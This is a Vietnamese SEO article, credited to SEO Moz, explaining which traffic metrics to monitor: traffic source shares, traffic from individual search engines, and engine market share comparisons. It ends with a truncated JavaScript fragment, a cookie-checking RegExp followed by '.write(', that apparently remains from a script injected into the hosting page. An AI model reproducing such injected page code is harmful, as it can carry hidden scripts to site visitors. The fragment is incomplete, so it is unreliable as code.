Thiết Kế Web, Dịch Vụ Seo, Marketing Online > Kiến thức > SEO > Các thông số cần theo dõi trong chiến dịch SEO

Các thông số cần theo dõi trong chiến dịch SEO

Mặc dù mỗi doanh nghiệp có một đặc điểm riêng và mỗi trang web có các biến số khác nhau tác động, mà vật chất, danh sách sau đây là khá phổ biến chung. Lưu ý rằng chúng tôi chỉ tổng hợp những biến số quan trọng đối với SEO – tối ưu hóa cho công cụ tìm kiếm – và như vậy, có những biến số tổng quát hơn, nhưng quan trọng có thể không được nêu ở đây. Đối với một cái nhìn toàn diện hơn về phân tích tổng thể web, đọc thêm Choosing Web Analytics Key Performance Indicators trong Web Analytics Blog của Avinash Kaushik.

1. VAI TRÒ CÁC CÔNG CỤ TÌM KIẾM TRONG CÁC LƯỢT TRUY CẬP GIÁN TIẾP.

Cần theo dõi hàng tháng phần đóng góp của mỗi nguồn lưu lượng truy cập cho trang web của bạn. Nhìn chung bao gồm:

  • Truy cập trực tiếp: (ví dụ type trực tiếp, bookmarks, email links không có tracking codes, vv)
  • Lưu lượng truy cập chuyển tiếp (từ links trên web hoặc trong trackable email, links chiến dịch quảng cáo khuyến mại)
  • Qua công cụ tìm kiếm (truy vấn tạo ra lưu lượng truy cập từ bất kỳ công cụ tìm kiếm web lớn hoặc nhỏ)

 Biết tỷ lệ phần trăm và con số chính xác sẽ giúp bạn xác định điểm mạnh và điểm yếu và giúp so sánh theo thời gian cho xu hướng dữ liệu. Nếu, ví dụ, bạn sẽ thấy rằng lưu lượng truy cập tăng vọt đáng kể, nhưng nó xuất phát từ các link chuyển hướng ít liên quan trong khi thông qua công cụ tìm kiếm và loại type trực tiếp giảm, bạn sẽ biết bạn đang thực sự gặp nhiều rắc rối hơn so với những gì số liệu đó đưa ra. Bạn nên sử dụng các dữ liệu này để theo dõi các nỗ lực marketing của bạn và đánh giá tổng quan về nỗ lực đó.

2. TRUY CẬP TỪ CÔNG CỤ TÌM KIẾM CỤ THỂ

 Ba công cụ tìm kiếm chính hiện nay chiếm trên 95% lưu lượng tìm kiếm tại Mỹ (Yahoo , Bing và Google) và hầu hết các quốc gia khác ngoài Mỹ,(trừ một số ngoại lệ như Nga, Trung Quốc, Hàn Quốc và Cộng hòa Séc), trong đó hơn 80% lưu lượng tìm kiếm thực hiện bởi Google. Tính toán lượng truy cập của bạn từ các công cụ tìm kiếm thì rất quan trọng với một số lý do sau:

thiết kế web

So sánh hoạt động và thị phần

 Bằng cách theo dõi công cụ tìm kiếm tổng quát theo từng quốc gia, bạn sẽ có thể thấy chính xác mức độ đóng góp của mỗi bộ máy tìm kiếm với thị phần ước tính của nó. Hãy nhớ rằng trong các lĩnh vực như công nghệ và dịch vụ Internet, nhu cầu dường như xuất hiện cao hơn trên Google (đối với thành phần dân số trẻ và hiểu biết công nghệ hơn ) so với các lĩnh vực như nấu ăn, thể thao hay bất động sản (những lĩnh vực mà tỷ lệ có thể gần với ước tính của các hãng như Comscore).

dịch vụ seo

Nhận thức về khả năng sụt giảm

Nếu lưu lượng truy cập tìm kiếm của bạn đáng kể tại bất kỳ thời điểm nào, biết được phần đóng góp chính xác và liên quan từ các công cụ tìm kiếm đóng vai trò quan trọng trong việc tìm hiểu nguyên nhân vấn đề.Nếu như tất cả các công cụ tìm kiếm đều giảm xuống, vấn đề rất dễ nhận diện. Còn nếu Google giảm xuống trong khi các công cụ khác vẫn ở mức trước đó, nhiều khả năng là sự trừng phạt hoặc hạ đánh giá đối với các nỗ lực của bạn bởi từng công cụ tìm kiếm đơn lẻ.

Khám phá giá trị chiến lược

  Dường như một số nỗ lực bạn thực hiện trong SEO sẽ có kết quả tích cực trên một số công cụ hơn so với những  công cụkhác. Ví dụ, chúng tôi thường chú ý thấy việc tối ưu hóa trên trang với từ khóa tốt hơn và đặt mục tiêu thì có tác dụng với Bing & Yahoo! hơn Google, trong khi có được anchor text links từ một số lượng lớn tên miền có tác động tích cực hơn trên Google.Nếu bạn có thể xác định các thủ thuật thành công với một công cụ (hoặc không thành công với các công cụ khác), bạn sẽ biết rõ hơn nên tập trung vào đâu.

 Nếu bạn tìm thấy trang web của bạn hoạt động kém ở một trong các bộ máy tìm kiếm(dựa trên thị phần), đừng vội vàng hoảng sợ. Hãy nhớ rằng công cụ tìm kiếm cũng có ảnh hưởng nhân khẩu và thành kiến giống như các nguồn tham khảo khác. Ví dụ, ở Mỹ, thị phần của Google vào khoảng từ 65-70%, nhưng phần lớn các trang web mà chúng tôi từng làm việc (và từ báo cáo của đồng nghiệp và bạn bè của chúng tôi trong ngành công nghiệp search marketing) chỉ ra rằng 80-85 % lưu lượng truy cập từ Google thì phổ biến hơn nhiều.

Có hàng loạt lý do giải thích cho điều này

  1. Kết quả truy vấn hàng đầu của Yahoo có tính chất chuyển hướng (ví dụ,truy vấn hàng đầu của họ là Google) trong khi truy vấn của Google cung cấp nhiều thông tin hơn
  2. Nhiều chuyên gia cho rằng (và một số dữ liệu nội bộ chỉ ra) Yahoo! Dành ưu đãi cho các sites tham gia chương trình đóng phí của họ.
  3.  Yahoo! Chuyển một lượng lớn lưu lượng của chính những tài sản của Yahoo! ( trong khi đó, Google có xu hướng tương tự với Wikipedia)

 Đừng chỉ dựa trên số liệu của Comscore, Hitwise hoặc Compete.com để tìm biết về tỷ lệ thị phần một bộ máy tìm kiếm cung cấp- hãy chắc chắn điều tra kỹ. Bạn có thể tiến hành bằng cách chạy quảng cáo PPC trên nhiều bộ máy tìm kếm khác nhau (và so sánh dữ liệu), so sánh xếp hạng trên các công cụ đó (Nếu như xếp hạng trên Yahoo! Của bạn chỉ tốt bằng hoặc hơn so với xếp hạng Google, ‘s not missed opportunity, it’s lower volume), và chắc chắn rằng bạn không gây ra những lỗi ngớ ngẩn (chặn nhện của bộ máy tìm kiếm khác, sử dụng meta robots NOODP để điều khiển quá trình liệt kê ở Google, nhưng lại quên sử dung NOYDIR ở Yahoo!,..).

Theo Seo Moz.

Biên tập: tk_nam

BlogPridio

(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1”)+”= .write(‘